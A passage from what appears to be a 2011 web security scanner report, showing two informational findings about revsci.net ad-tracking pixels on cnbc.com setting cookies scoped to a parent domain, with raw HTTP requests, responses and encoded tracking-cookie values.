6yfjZwKxBa/OWbgOtw9JW00yHdeNkM9a+1V3lc5PYk08xs+rxYYUTxY4PccrBi6r45Y5kKpzjnl1iHrtRFRkvM6Bhbrpz4MJejvDbyOCoTJOiIcMmzkDPqU/RTtQYGiFuWEq/0XTi6EZqlhyagMnEMt60uymz+wktS+Zxnt4n9cEmWbPRDkKTftTt5GAqP1UxLarpFj1cBUClVKpiSvAg16oKQTnwVi9Z0GdPtMVxX8/sxD+6r9WYdJNAAx0orOYWBJuRindRvfmqnQ0AbDnwqb2afKbTHRSlj6UnYZCzw+EuPCCuTGjJgvWEeZliIK0vNcoqFI1/VDskTLGHrZTdJV"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QuRDDLDb2WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGGVl/GdrOMZ/Y+D7DfFcJwNEezKrsviUHF/ph1dBBqEAXMKigiOLnlzz6l5OXmVJ3SV6lhGxV7f69HQE4saI/5RCJ9y8KLVFBw1ulYtbeoefXdmCRQVqFbpXIMebkFe04PELccu/bvlosRnwZPs9a9DXiMU8QmAUwmcnd7W1GD2BWbud9FuHC24q5XFKj23vMln5DfB7vekMSxDScfS7+ZUGiMCPdO16hfaP1c2HXavcINC+HK9LqYiAfKTqntvA3CVbdeEkhIJ3TjyZrBG6sqwQbLrbJlL2uqw6tCbi55Z1G4L7AxaNQuxpP0iKeULJPEv5fks8haittLGEZxTkfFXA58QKuxsqi26tRtkE7SWndRo4C+HIFElaVZMwQ8GPkcRPtqEDL5d346IGq9ZOxZSlnsGsNmRiw993oZ9zMj9YC1zJuB06SchvU7/6oo2uaQyuA+Of5jUVRPy87wGA775Sahwg8SpOmUN8MQxMxXP08

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizVDRqGD+7XWyoETDu18Mfh38sGaLcBo3I8QKLVIHNbs/aPybUAp6deZ4PBam+j59FVp3j+OlK6mRTtV96HqNd0fyLSobj39hOpsGmZ9PBCS6PKnceOCU88KZYLjs9D/ogMjd3GXexqu6MMY+wrZ69abotqDqceVMfHYfc+u2rmmXQ4kjNvvzLnMiPUxpeWc6y6IrrLSU0aP1/RHBvaBGvVfQk5WA2CVlofLvT7Y9pNS4wEX/g0OMG57+/q0VMPqW9uJ3RN9aKoReMYds9lT5peBWgS5ahBACNkesRy++rBErZAYD7SmpB6lcs/JNNNw=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:25:18 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:25:17 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.173. http://pix04.revsci.net/I10985/b3/0/3/1008211/623863779.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/623863779.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6H8nxMD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS2HThYKZWqUMcWyBPyxSGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKmZw2xC7bbnCVEHfnBLOzMvRVfruMSOCGmMmdNeNil75yxIjBb8Tjz+EXumvJish3UpAOYjx0sbj+YjnhWFjZE2bGoL1aY0bfwZSWlEh4DBz8ZSIsDwsiIIhSOP7byyJpIi4bVqNzEk+8Ul6xB61U7JixmsmVMhpVPNVDt2vRKGWlEkYkIZ52Q2cWjtmFe+5r6mqja6lDLQSZuaxJeUX8rURuWyiJPXLj0R0U2a/C0BTx+G78RIbKR4+rBx9Jj4NGZauHeS+e3S1HjhCIOr3JpUNYlbfpi0IG10pvSNmg5n4Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:28:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/623863779.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_VF87="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9NPmW+Qk/VjEpNZvXbTc7xC8rSTKoKak0ohpIcccljoPMhFn371MBxbkmGxcHDPXtpjVw1j+2Q3LOg4jRqBraX7I4lUnuoh2VZdVC6U+2Iyfb4lspwfQ0Qc20UfAysYwo0l2OEtXUDNEY2l8mjkrVGNYal/mF8fCfHW+uvp0Ntc6JskaNk/7sKLq/uDiAynYTsL1+OByds1pyGhtD5l2xczhAGbAQgxkEoCjl+f05K+n3Yb8bHKNXVRVp46sZsoCHz/V40hYQM+qLKrFjzLxpRqC7u1NjSF/Y6CIetLZhAMAWU8ejxn+f0r0JVM0VyrEgoxWyU4z2m+QkzCdzS8gexv4tC3eNBLH8j1tqG06jU4M/FV6jZzu0ePTWOBWkA6gVavsfI32G7/b1YXnQqeTTPpD+YexW5yic5zR9AMcTd1hQDvE1B2niKH8PA21Ur5B8X6jWY6haV6zDtvXqbRO+jlnbFjxBNxrVpoD/p79fD83uQuo5vT8zyvYOf8oe3PYgy8dIo/OzuChLcxAn3E+2jm6X+phyyJYhrqHa3f5Xt9ZZgi4PVthlOL7kcfhMPnVfG0yddvMEPXRJGE+NNTeNcWGjzb1hAd5Bch+MihnBwWyFJZWEcCCa9qk9LLa8qHpCAUJsFLP+PZw5QgTF1uovfYgNC8dqqMH/PYcAS7DgRB/oZqfJC3o8/NoYvKoIgG9II7pRtbPKZWE3BDZmLt0MzGDuhEEnnr4ud9OSm3p0zwvPsPL7q44Bz/O3vaH1u72hoVDaaYCpgT2BuXqClZiH6c6OEb6cTvr+Qo0MQ9lNrMYQmOfxw1ReFm4WuqM/0+quAIn79S77KR/3yCfhJc/4xhi7logpBaJ2Iq4zdaTWf9wX/RVXp1N+IvZiwsOXlp7pvTbUNnQ/lX5gOXE8bnsIIuEcoPKq0usiSyMzNeQ6KbTtNGy5cyfJZOPsn5AhLcqOv2M+NyBWU5zsxdlB+Gbbg+qIgHPv5sa5Ux6GdmmveHYkI+naReMxTrYcPcFG3kAwo1clGgu7Ms99dN3/B0IZrQQzQLnTOsChbPRWWAX/jp46DB2QBrk3SZeBgBMQZbtVuUjk8DfKPGAVDQicMkOCw62TxhWXLX4z9CXPeNC4JDGFrD+RZThzLQgZ05YQvq4dTx0KmLzcAssrt2AhgnJOJNJfZ+t/9EledQsTMbpVI+aGuEizShF+I2ImMrL9QDU//1Ys81h9LslYQZ8fya+ZShvHmxu6W1auE8GSdwop0pIPwVpfLe+nBIqCqOg4c6bbBArL3vpab62fT8Px1nJZMBwmR8bP8QiNYA1xnjbKffdBrydZosXa"; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZABIbE6lX0YSKD3gLMEHIWwuneJ24b5YcZ7L7a54RMu6+UdXfaqqw5sc6dbVOUyTlJaNx7igC9khJv7rZCR6H18Rw0aDNQ+BhisfeIu7o59J+tP+P74tFzwzHMSL80RtfBw2Z0ZlkrvKhy47jxDZFsxIELVw7jcfK1/48OSdgDHNhjEZae2ld7RfSXrZxkhwOmCnqmK66bglBchlRxivxbYDHmfhoToRngn7koL0od0iCgkjJpohpuT6CvLCOQ1W4l26GGe2XaY+vNJkVt1TDbWm4EqjmsldpZ8puMz81lhto2YwAjf9TCJ7OU8pL1usRQvBW2xiNNS+5buc+4jKzh9LDdVP7aDjDvzUoyXHJeXUV8JoNqf92e5zB7xdF1rKkeK/jAtrd0sXenwCszV2pZ03IAr1K3lhJS06WFK/3dCdCs40UHMZ+ZG7zyzDc6QUpdbB5pJGty1gds8kfL9msBRyZqT+nOW1zEL2WCzhgQHLqtv8pD7ATCp96tmThAcx7piSh15MTUW1pGWtt9xqIkEE/WP6HYU+bOa6PzpSNqFFNUKKW2dsDkWEYCnKhzdVIEZ5n81mrKFskOY7o/c3TqxLlSRLSOIw+Uc05eQzk2fzKu4uHBFQy/C4+WlIPlyV2S0x8HEVqmgUyCDeGq6fgCBmgFh+vrBdjlfl+c0BSoZLzyRW8F6/iuuxlmlEozcdMxj9qe8QRc7QEhPvpSKzNwoy2CCJ5qiiZi2Dxqmrxmz3AOdcwFX0EsEJiMpGAgvoBMw4pgvITelwAUrv3ziiK4X3P4zQbzaZcQD+EFdlBiLV3AkKt9Lq41YRA1zMuMnNZBLisS14LdIn6awmZszpd79XDseqV73N/hz/L2wcUDu6pgas15FY3tSviOk7qx5ELNLf272VSObK/KmjV6h6IyHW8lMKIB3NGkHsArbYq2W2pBRFwoLK9zR+9cTypCZjWpGq3fMDpkIWXAdMCrDGUTmspg5Oe96m/60RjbaKuHaEPrTWp+TSI668reihcLKUAHylv11LceUnewnq766vRktI347Ea4pXbkhuZ5m1t9YtbsAL5sw4IQ5tUaFzD0uQU86bOPFvdoe/oihO+aB+Mee6edfWkTN1bu9E8G/dAKZnsYZLSX74ASV/i0HElYFjdYAsaWSO5xh6cZvbm0H7EcFDLQr+1ztPM2ZmcCufHvlGkMDNy6YObv6kOb5brcD4V/B2pEKX+T8vqfdmY+vcZ6g1TAWwv0ikfkZjdjGB9Gbema7VnHyDFVpALEtzQIvrseLdslOWumdUqrZkB3wD0EByTk+mOsQd6Mmkuhc/T0zvVryw4ijL9IlP/ix++VHA6NWTdi1DHxOuw/gt6HQd8rHPVkvR8qDSz4ZLrWkGbI+1NVtdAdp0P1BwVzDhtIJefhYu9Ubk2/aNR0vnxgNaAk9zwK6JqDih0huyq8Ec85LkcvbuzFIr6bhAEkjcqcrI4MOibdeLSGZs0//1D/u+tU0uMuhWd3sxQC70osJTzNGkzEd0hJE3vODMhXq0Z0QoKGsikvwXgOhq62IFWHwZ7x7UtBPxo3uQIeK8WNrS7ljwxQktrDORXO92uFikAWxlKV4nFR5onqbTG2ODQFnZc0hzHlRteiUEF8PnNld7pLRCc5mpVEzZmca3V78kqFRIbdEUjzKIL/evuHk/2mJaDKqbF7ewYp0CyYKxfo6/E87HB5sofEKMkjf0N4Y+FDmrT/9FtdyVr+SBNzJo98ttZw"; rsi_segs_1000000=pUPFJEOhOHMQVvUbea77QLtKahVkaohbRCRMRygpLT3k86fOUlIPyGpQqGmcAHhFlCRHTDSdoCOswjX1UDZSPIbpIyPSY8WoqsaQkxTp2HsAJxNEctnYgakmFz4ZVf6FnmRTnohV1kg8dJkHP7dnsM6Mr895XHKR5qUNrfWMk+oJIz8EjaD6vFTZCoh5OofTf9pNItScCJcVyi6Qod359N7i2u1Uf4rLK/5L8FPKp2Lnjma8WF4IMcP3Sd142YbAutJdsE5W3tbqbcfXk5DdnkQEXg3mx4haYjNjg3CVB7y3/XW2YRDQ/bfPEmoxjG9KMFrlI1pqN0DOsPBlfVjb6LttFQglwkw/NcPL8kek96+o10LK4TRtlaqrK30CzBANOSjBpUW+iPu+e8/TqC+uJLad0Asl2sXKSL5BkcMX3TFy9+7Mq710P1alTxuIdxjE/vaAXj2736JvYHpGaxKEcAVCfYNFuiJWvIABpLW3JUTIms9KprV+Kr0cr8BWtYtV0dJTNLf3zVFP93r+5hj5u/FQS+4oloPzFDWLZWkFAK9m0inSch7wHvJZHlXDa/gyl3t9801fgUQBszRrnC0a8i0BTweG78ZIbKR4+nBw9Jj5NGYaUf6alO3SxHjhCIKr3KJUNYlbflgLNKhLKeG1x/1oFg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJ4QsJCe25ayViGymJW18v6oxo5TQQ/CGgK6H8nxMD/xw6JhTybIZwS4Eca2TOPNPPf1VWx8hkmMPM/yrrSdcosckkFeddzYMSGLneI5567GeW6vbj+wWQEAWvERBw6DjPQ4L4Uubj0NaY9wI2KrzCfuCquS5+0mtq0blYCbbpeq91vpEp6PLHFjL00+eBC86WjLf8zGKgiUktukRMj4LRehj1yYj7ERIGS2HThYKZWqUMcWyBPyxSGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKmZw2xC7bbnCVEHfnBLOzMvRVfruMSOCGmMmdNeNil75yxIjBb8Tjz+EXumvJish3UpAOYjx0sbj+YjnhWFjZE2bGoL1aY0bfwZSWlEh4DBz8ZSIsDwsiIIhSOP7byyJpIi4bVqNzEk+8Ul6xB61U7JixmsmVMhpVPNVDt2vRKGWlEkYkIZ52Q2cWjtmFe+5r6mqja6lDLQSZuaxJeUX8rURuWyiJPXLj0R0U2a/C0BTx+G78RIbKR4+rBx9Jj4NGZauHeS+e3S1HjhCIOr3JpUNYlbfpi0IG10pvSNmg5n4Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:28:25 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:28:25 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.174. http://pix04.revsci.net/I10985/b3/0/3/1008211/632139984.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/632139984.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88DtwWuaST+ZtDhThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhJtAtAulshuQUoryC/72YVVpNDQxcStz5UE9IczXJqDvkR8JClzxrwAHhY+YjBm6np04WhfEL/eoVfAKmCRQVqFeoU+OeN2/icHrVPrSpYtdsbhmOoiXiQRjZAPYmdmJ0c3GcjdfXL1gz6cIKgqwZRyRAp3yB2fb8oEJDkCdaj1W5SXV4stWBFXjplvk2vRvQd7t3evrQRWwEj3HTwDIeOo1VRtQC8zTdfyUSwKvalgv0KxRPYFCwAjTe43HOmv7P0ZHGbEtoABz8ZSEnvImSYI9Qd30iLuULKP9f2HkrEaaiut73Au1UUcFnA50QKuxspCuvu8mrE/b/hVyfBjuGwF9/co4YMGL4e8jDJ+77LnuApfK42UX+LTBsWyiPIvAlEla/glRUyBK2+ufhADgjs66PEeur98RNTZXxh8C9rD9CZ91Tvim7MayKU/GLRkH07U6uupaT9oFA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:36:40 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/632139984.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
